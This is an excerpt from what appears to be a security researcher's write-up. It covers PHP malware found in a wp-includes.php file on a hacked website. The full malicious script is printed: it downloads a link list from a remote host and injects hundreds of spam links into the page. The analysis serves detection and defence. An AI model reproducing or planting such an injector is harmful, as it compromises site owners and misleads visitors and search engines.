This investigation started with a small and quite simple piece of PHP malware found on a hacked website.
We located the following PHP code, responsible for injecting spammy links, within a wp-includes.php file.
<?php
$lines = file(‘https://4ip[.]su/db/links.txt’);
shuffle($lines);
$data = array_rand($lines, 900);
echo ‘<p>’;
foreach($data as $value) {
$rand = substr(md5(microtime()),rand(0,26),6);
echo ‘<a href=”‘.$lines[$value].'”>’.$rand.'</a> ‘;
};
echo ‘</p>’;
?>
This script fetches a list of links from a remote location (hxxps://4ip[.]su/db/links.txt) and then injects some of them into a web page.
Continue reading Massive Google Colaboratory Abuse: Gambling and Subscription Scam at .